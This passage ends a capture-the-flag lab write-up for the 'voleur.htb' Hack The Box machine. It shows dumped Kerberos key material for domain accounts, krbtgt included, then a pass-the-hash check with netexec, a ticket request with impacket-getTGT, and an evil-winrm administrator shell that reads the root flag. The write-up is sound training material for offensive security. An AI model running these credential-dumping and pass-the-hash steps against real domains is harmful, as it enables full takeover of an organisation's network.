Administrator:des-cbc-md5:459d836b9edcd6b0
DC$:aes256-cts-hmac-sha1-96:65d713fde9ec5e1b1fd9144ebddb43221123c44e00c9dacd8bfc2cc7b00908b7
DC$:aes128-cts-hmac-sha1-96:fa76ee3b2757db16b99ffa087f451782
DC$:des-cbc-md5:64e05b6d1abff1c8
krbtgt:aes256-cts-hmac-sha1-96:2500eceb45dd5d23a2e98487ae528beb0b6f3712f243eeb0134e7d0b5b25b145
krbtgt:aes128-cts-hmac-sha1-96:04e5e22b0af794abb2402c97d535c211
krbtgt:des-cbc-md5:34ae31d073f86d20
voleur.htb\ryan.naylor:aes256-cts-hmac-sha1-96:0923b1bd1e31a3e62bb3a55c74743ae76d27b296220b6899073cc457191fdc74
voleur.htb\ryan.naylor:aes128-cts-hmac-sha1-96:6417577cdfc92003ade09833a87aa2d1
voleur.htb\ryan.naylor:des-cbc-md5:4376f7917a197a5b
voleur.htb\marie.bryant:aes256-cts-hmac-sha1-96:d8cb903cf9da9edd3f7b98cfcdb3d36fc3b5ad8f6f85ba816cc05e8b8795b15d
voleur.htb\marie.bryant:aes128-cts-hmac-sha1-96:a65a1d9383e664e82f74835d5953410f
voleur.htb\marie.bryant:des-cbc-md5:cdf1492604d3a220
voleur.htb\lacey.miller:aes256-cts-hmac-sha1-96:1b71b8173a25092bcd772f41d3a87aec938b319d6168c60fd433be52ee1ad9e9
voleur.htb\lacey.miller:aes128-cts-hmac-sha1-96:aa4ac73ae6f67d1ab538addadef53066
voleur.htb\lacey.miller:des-cbc-md5:6eef922076ba7675
voleur.htb\svc_ldap:aes256-cts-hmac-sha1-96:2f1281f5992200abb7adad44a91fa06e91185adda6d18bac73cbf0b8dfaa5910
voleur.htb\svc_ldap:aes128-cts-hmac-sha1-96:7841f6f3e4fe9fdff6ba8c36e8edb69f
voleur.htb\svc_ldap:des-cbc-md5:1ab0fbfeeaef5776
voleur.htb\svc_backup:aes256-cts-hmac-sha1-96:c0e9b919f92f8d14a7948bf3054a7988d6d01324813a69181cc44bb5d409786f
voleur.htb\svc_backup:aes128-cts-hmac-sha1-96:d6e19577c07b71eb8de65ec051cf4ddd
voleur.htb\svc_backup:des-cbc-md5:7ab513f8ab7f765e
voleur.htb\svc_iis:aes256-cts-hmac-sha1-96:77f1ce6c111fb2e712d814cdf8023f4e9c168841a706acacbaff4c4ecc772258
voleur.htb\svc_iis:aes128-cts-hmac-sha1-96:265363402ca1d4c6bd230f67137c1395
voleur.htb\svc_iis:des-cbc-md5:70ce25431c577f92
voleur.htb\jeremy.combs:aes256-cts-hmac-sha1-96:8bbb5ef576ea115a5d36348f7aa1a5e4ea70f7e74cd77c07aee3e9760557baa0
voleur.htb\jeremy.combs:aes128-cts-hmac-sha1-96:b70ef221c7ea1b59a4cfca2d857f8a27
voleur.htb\jeremy.combs:des-cbc-md5:192f702abff75257
voleur.htb\svc_winrm:aes256-cts-hmac-sha1-96:6285ca8b7770d08d625e437ee8a4e7ee6994eccc579276a24387470eaddce114
voleur.htb\svc_winrm:aes128-cts-hmac-sha1-96:f21998eb094707a8a3bac122cb80b831
voleur.htb\svc_winrm:des-cbc-md5:32b61fb92a7010ab
[*] Cleaning up... 

User - Administrator

We verify that the hash works.

❯ faketime "$(ntpdate -q voleur.htb | cut -d ' ' -f 1,2)" netexec smb dc.voleur.htb -u administrator -H e656e07c56d831611b577b160b259ad2 -k
SMB         dc.voleur.htb   445    dc               [*]  x64 (name:dc) (domain:voleur.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         dc.voleur.htb   445    dc               [+] voleur.htb\administrator:e656e07c56d831611b577b160b259ad2 (Pwn3d!)

Using a Kerberos ticket we gain WinRM access and read the root.txt flag.

❯ faketime "$(ntpdate -q voleur.htb | cut -d ' ' -f 1,2)" impacket-getTGT -dc-ip 10.10.11.76 voleur.htb/administrator -hashes :e656e07c56d831611b577b160b259ad2
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in administrator.ccache
export KRB5CCNAME=administrator.ccache
❯ faketime "$(ntpdate -q voleur.htb | cut -d ' ' -f 1,2)" evil-winrm -i dc.voleur.htb -r VOLEUR.HTB
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
voleur\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../Desktop/root.txt
414555fd7619ecd56b6ab3a15d7d9167
*Evil-WinRM* PS C:\Users\Administrator\Documents>
Written by sckull (Dany Sucuc)